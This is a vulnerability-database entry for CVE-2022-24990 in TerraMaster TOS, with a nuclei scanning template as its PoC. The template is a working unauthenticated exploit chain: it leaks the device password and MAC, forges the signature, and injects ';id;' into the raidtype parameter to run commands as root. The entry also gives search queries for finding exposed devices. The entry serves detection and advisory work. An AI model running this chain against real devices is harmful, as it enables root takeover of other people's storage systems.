TerraMaster TOS Unauthenticated Remote Code Execution Vulnerability

漏洞信息

漏洞名称： TerraMaster TOS Unauthenticated Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2022-24990

漏洞类型： 命令执行

漏洞等级： 严重

漏洞描述： 该漏洞影响TerraMaster NAS操作系统（TOS），版本号低于4.2.30。TerraMaster TOS是一款专为TerraMaster NAS设备设计的操作系统，广泛应用于个人和企业数据存储解决方案中。由于其易用性和功能性，TerraMaster NAS设备在家庭和小型企业中非常受欢迎。漏洞存在于api.php?mobile/createRaid接口中，由于未对raidtype和diskstring参数进行充分的输入过滤，导致攻击者可以通过构造恶意参数实现远程代码执行。具体来说，攻击者无需任何身份验证即可利用此漏洞，通过发送特制的HTTP请求，在目标系统上以root权限执行任意命令。这可能导致攻击者完全控制系统，访问敏感数据，甚至利用受感染的系统作为跳板进行进一步的网络攻击。由于漏洞的利用不需要用户交互，且攻击者可以通过网络远程利用，因此该漏洞的安全风险极高。

产品厂商： terra-master

产品名称： terramaster_operating_system

影响版本： < 4.2.30

搜索语法： app=”TerraMaster-TOS”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/02299e16d2fc7fc7b63f8c57c0064df40e0447b1/http%2Fcves%2F2022%2FCVE-2022-24990.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2022-24990

info:
  name: TerraMaster TOS < 4.2.30 - Unauthenticated Remote Code Execution
  author: iamnoooob,DhiyaneshDK
  severity: critical
  description: |
    TerraMaster NAS versions through 4.2.30 contain a remote code execution caused by unsanitized parameters raidtype and diskstring in api.php?mobile/createRaid, letting WAN attackers execute arbitrary code as root, exploit requires remote network access and crafted parameters.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to a full compromise of the system.
  remediation: |
    Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
  reference:
    - https://github.com/0xf4n9x/CVE-2022-24990
    - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation
    - https://packetstormsecurity.com/files/172904
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24990
    cwe-id: CWE-78
    epss-score: 0.94401
    epss-percentile: 0.99970
    cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: terramaster_operating_system
    shodan-query: 'TerraMaster'
    fofa-query: app="TerraMaster-TOS"
    google-query: intitle:"TOS"
  tags: cve,cve2022,terramaster,rce,unauth,kev,terra-master

http:
  - raw:
      - |
        GET /module/api.php?mobile/webNasIPS HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS

    extractors:
      - type: regex
        name: pwd
        group: 1
        regex:
          - 'PWD:([^\\]+)'
        internal: true

      - type: regex
        name: mac
        group: 1
        regex:
          - '\\"mac\\":\\"([a-zA-Z0-9:]+)\\"'
        internal: true

  - raw:
      - |
        POST /module/api.php?mobile/createRaid HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS
        Timestamp: '{{unix_time}}'
        Signature: '{{md5(substr(replace(mac, ":", ""), 6) + unix_time)}}'
        Authorization: '{{pwd}}'
        Content-Type: application/x-www-form-urlencoded

        raidtype=;id;&diskstring=XXXX

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=0\\(root\\) gid=0\\(root\\)"

      - type: word
        part: body
        words:
          - "createRaid successful"

      - type: status
        status:
          - 200